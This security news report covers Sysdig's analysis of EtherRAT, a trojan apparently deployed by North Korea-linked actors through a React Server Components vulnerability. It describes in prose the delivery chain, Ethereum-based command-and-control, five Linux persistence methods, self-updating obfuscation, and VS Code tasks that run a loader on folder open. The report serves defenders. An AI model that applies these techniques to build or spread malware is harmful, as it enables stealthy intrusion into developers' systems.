Researchers at the cloud security firm Sysdig said that threat actors with ties to North Korea have likely exploited a critical React Server Components vulnerability to deliver a previously undocumented remote access trojan dubbed EtherRAT.
The attack chain begins with exploitation of CVE-2025-55182 to execute a Base64-encoded shell command that downloads and runs a shell script. The script attempts retrieval with curl and falls back to wget or python3, prepares the environment by downloading Node.js v20.10.0 from nodejs.org, writes an encrypted blob and an obfuscated JavaScript dropper to disk, removes the initial shell script to reduce forensic traces and launches the dropper.
EtherRAT uses an unusual command-and-control resolution technique that relies on Ethereum smart contracts and a consensus mechanism across nine public Ethereum RPC endpoints. The implant fetches the C2 server URL from the contract every five minutes, querying the endpoints in parallel and selecting the URL returned by the majority to defend against single-endpoint compromise or researcher manipulation.
Once connected to a C2 server, the malware polls every 500 milliseconds and treats any response longer than 10 characters as JavaScript to execute. It implements five separate Linux persistence mechanisms – a systemd user service, an XDG autostart entry, cron jobs, .bashrc injection and profile injection – and can self-update by sending its source to an API endpoint, receiving a differently obfuscated but functionally identical payload, overwriting itself and launching the new code.
The activity shows overlap with a long-running campaign known as Contagious Interview that targets blockchain and Web3 developers through fake job interviews, coding assignments and cloned repositories. Analysis by OpenSourceMalware revealed variants that instruct victims to open malicious projects in Visual Studio Code, where a configured tasks.json file can trigger a loader automatically on folder open and fetch subsequent payloads.
Sysdig characterized EtherRAT as a significant evolution in React2Shell exploitation that shifts activity toward persistent, stealthy access intended for long-term operations, and warned defenders that the implant resists traditional detection and takedown approaches.